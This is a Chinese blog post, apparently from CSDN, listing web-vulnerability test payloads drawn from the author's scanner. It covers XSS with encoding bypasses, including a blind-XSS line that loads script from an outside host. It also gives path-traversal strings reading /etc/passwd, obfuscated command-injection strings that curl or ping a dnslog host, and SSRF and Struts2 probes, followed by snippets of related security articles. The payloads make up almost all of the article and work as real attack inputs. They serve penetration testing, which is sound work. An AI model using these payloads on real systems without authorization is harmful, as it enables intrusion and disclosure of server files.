WEB漏洞测试payload整理

Web漏洞测试Payload集锦
最新推荐文章于 2025-07-23 15:12:05 发布
最新推荐文章于 2025-07-23 15:12:05 发布
阅读量1.6k 收藏 6
点赞数 2
本文整理了常用的Web漏洞测试Payload,包括XSS、命令执行、SSRF等漏洞的测试代码,适用于不同类型的Web应用安全测试场景。

常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。

[反射型xss]

[在html形成]

" '><script>document.title="[random]";</script>
<script>document.title="[random]";</script>
<svg onload=document.title="[random]";>

[在js形成]

document.title="[random]";//
;document.title="[random]";//
";document.title="[random]";
';document.title="[random]";
");document.title="[random]";
');document.title="[random]";

[在html属性形成(img)]

888" onload=document.title="[random]" a="
888' onload=document.title="[random]" a='
888 onload=document.title="[random]" 

[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况

<script>alert(/StoredXssByScriptTag/);</script>
"'><script>alert(/StoredXssByScriptTagBypass);</script>
[Bypass on Event] [事件型绕过]
<img src=1 onerror=alert(/StoredXssByImgTag/)>  #一般富文本不会过滤img标签
[Bypass pseudo protocol] [伪协议绕过]
<iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
<object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
[Bypass html5 tag] [html5标签绕过]
<svg onload=prompt(/StoredXssBySvgTag/)>
<embed src=javascript:alert(/StoredXssByEmbedTag/);>
[Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
<embed src=javas&#99;r&#105;pt:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
<video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
<script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
如果进行盲测可以根据xss平台地址替换相应的js触发代码
"><script src=http://myxss.net/xxxxxx></script>

[静态文件读取]
[常规检测]

/../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/hosts     
/../../../../../../../C:/Windows/system.ini [windows]


[伪造绕过]

/././././././././././././././././././././././././../../../../../../../../etc/passwd      
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd     
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts 


[后缀绕过]

/../../../../../../../../../../../etc/passwd#
/../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../etc/passwd#.jpg
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd#.html
/../../../../../../../../../../../etc/passwd%00.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html


[命令执行漏洞]


[常规检测]

;curl [random].test.dnslog.link
 | curl [random].test.dnslog.link
 | ping -n 2 [random].test.dnslog.link [Windows]
 | ping -c 2 [random].test.dnslog.link  [Linux]


[绕过检测]

;curl [random].test.dnslog.link#
 | curl [random].test.dnslog.link#
%20|%20curl%20[random].test.dnslog.link
%20|%20curl%20[random].test.dnslog.link#
%20|%20ping%20-n%202%20[random].test.dnslog.link
%20|%20ping%20-c%202%20[random].test.dnslog.link#
a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link
a=c;b=url;$a$b [random].test.dnslog.link#
${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link
a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link
a=c;b=url;$a$b{IFS}[random].test.dnslog.link#


[ssrf漏洞]

http://[random].test.dnslog.link/


[strust2命令执行]

?redirect:http://[random].test.dnslog.link/%25{3*4}

Web安全Payload的探索与Kali渗透测试框架-msf
NJU phd 在读。
03-16 1162
文章目录1 MSF基本介绍2 将数据库与MSF关联3 POC&&EXP4 Payload5 bundler和msf版本不匹配问题6 msf使用步骤6.1 查win7 和 kali ip地址6.2 运行msfcon 自动补全6.3 逐步运行msf各个模块 1 MSF基本介绍 metasploit 是一个开源框架,这个框架用来做渗透测试,其 msf 是由多个不同的模块组成的。可以在 k...
安全测试工程师】超实用的Web渗透测试学习路线~
weixin_44433834的博客
08-02 3679
前言 本文整理的学习路线,清晰明了,重点分明,能快速上手实践,相信想学的同学们都能轻松学完。都是干货啦,先收藏⭐再看吧。本文偏基础能让萌新们快速摸到***测试的门道,少走弯路,也能让正在学习的小伙伴们查漏补缺,也欢迎大佬们在评论区指正错误~ 先上脑图 其实安全测试需要的知识面是非常广的,但跟着教程有重点地学习还是能很快理清思路上手测试的,后续可以自己深入研究,吃透这些领域的知识。 首先我们要了解什么是***测试。 我们知道业务功能、逻辑的测试有黑盒测试和白盒测试,前者把程序看作一个不能打开的黑盒子,在完
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
XSS payload大全
01-22
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
web安全入门学习笔记9——XSS Payload 深度解析:原理、攻击与防御
最新发布
sinat_36670976的博客
07-23 1258
​​预防​​:输入验证 + 输出编码 + CSP策略​​检测​​:自动化扫描 + 人工审查​​响应​​:及时修复漏洞 + 安全通告​​恢复​​:清除恶意代码 + 撤销泄露凭证​​改进​​:根因分析 + 流程优化​​终极防线​所有用户输入皆不可信所有输出必须按上下文编码实施最严格的内容安全策略保持框架和安全库更新定期进行安全审计和渗透测试。
SQL注入Playload List
qq_52014772的博客
07-22 1452
SQL注入是一个网络安全漏洞,它使攻击者能够干扰应用程序对其数据库的查询。 SQL注入类型 类型 描述 In-band SQLi (Classic SQLi) In-band SQLi注入是SQL注入攻击中最常见和最容易利用的。当攻击者能够使用相同的查询发起攻击并收集结果时,就会发生In-band SQLi注入。In-band SQLi注入的两种最常见类型是基于错误的SQLi和基于联合的SQLi。 Error-based SQLi 基于错误的SQLi是一种In-band..
测试点的payload
HoAd'blog
08-17 365
一些测试点的payload,后续继续补充电子邮件地址图片名字 电子邮件地址 以下payload都是有效的电子邮件地址 XSS(跨站脚本): test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com 模板注入: "<%=7 * 7 %&g
常见Web漏洞整理
TH_DL的博客
07-14 914
对常见的Web漏洞的基本原理,利用,防御的整理,包括XXS、CSRF、注入攻击、SSRF、文件上传、文件包含。
《MetaSploit渗透测试魔鬼训练营》之WEB应用渗透技术_web漏洞渗透实验利用metasploit
2401_84572928的博客
04-26 405
PASS_FILE 虽然没有要求,但是加上的话肯定是要快一些的,同样USER_FILE也是,这两个是单独的,还有USERPASS_FILE是用户密码本,每个一行,空格分隔。Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。缺乏传输层保护:明文传输,没有使用SSL/TLS进行加密。
Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞
2401_86951451的博客
09-12 1500
如果有waf拦截web流量就走加密传输,如果始终连接不上就要一步步的进行排查。这里可以在一句话密码后面输出一个echo 123,通过是否有回显来探测哪一步没有完善导致连接不成功。
xsspayload大全.txt
11-29
各类xss漏洞payload,包含:没有事件处理程序、没有空间、无斜杠(/)、没有等号(=)、不带尖括号(>)、无提示,确认,提示、类payload
web漏洞之payload
hdquan321的博客
04-30 9085
什么是payloadpayload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。 也有人把payloads称 为shellcode。 Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 payload有几种类型: 1、sing...
xss|常见payload
时光
03-23 767
7.referer UserAgent Cookie等地方也可以进行xss测试。2.绕过htmlspecialchars方法,先闭合输入,再使用事件来绕过。3.<> script onclick被过滤,用a标签绕过。6.使用type=text来显示被隐藏的标签,再用事件。9.用这些字符来测试哪些被过滤了。5.Unicode编码绕过。10.空格用回车编码代替。
探索Payloads:一款强大且灵活的安全测试工具
gitblog_00089的博客
03-22 484
探索Payloads:一款强大且灵活的安全测试工具 在网络安全领域,漏洞探测和安全测试是确保系统安全的重要环节。今天,我要向大家介绍一个开源项目——,这是一个精心设计的工具库,专门用于构建、管理和分享各种安全测试载荷。让我们一起深入了解一下它的功能、技术特点以及为何它值得你尝试。 项目简介 Payloads是一个由Python编写的项目,旨在为渗透测试者和安全研究人员提供一个集成的平台,以生成、搜...
Payload大全
Zeker62的博客
09-05 422
目录SQL注入判断注入类型各种函数作用数据库基本库常规方法基本报错注入updatexml报错注入时间盲注floor报错注入extracevalue()和updatexml()的报错注入宽字节注入SQLite 注入绕过过滤关键字过滤空格SQL读写文件python :SSTISQL注入 判断注入类型 //判断注入类型 ?id=1' ?id=1" ?id='' ?id="" ?id=") ?id=')...
网络安全领域常说的payload
weixin_30633405的博客
10-18 2476
之前参加过一次网络安全讲座,讲师经常提到payload,好奇到底什么是payloadpayload,翻译过来是有效载荷 通常在传输数据时,为了使数据传输更可靠,要把原始数据分批传输,并且在每一批数据的头和尾都加上一定的辅助信息,比如数据量的大小、校验位等,这样就相当于给已经分批的原始数据加一些外套,这些外套起标示作用,使得原始数据不易丢失,一批数据加上“外套”就形成了传输通道的基本传输单元...
漏洞payload 靶机_CVE-2018-15982漏洞复现
weixin_34979632的博客
01-13 377
开篇闲聊:自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。漏洞概述:受影响的版本:Adobe Flash Player <= 31.0.0.153Adobe Flash Player Installer<= 31.0.0.108不受影响的版本:A...
web xxe测试实例
03-08
</think>### Web应用XXE漏洞测试示例与检测方法 --- #### 一、XXE漏洞测试实例 1. **有回显的XXE利用(文件读取)** 构造包含外部实体的XML请求,尝试读取服务器文件(如`/etc/passwd`): ```xml <!...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值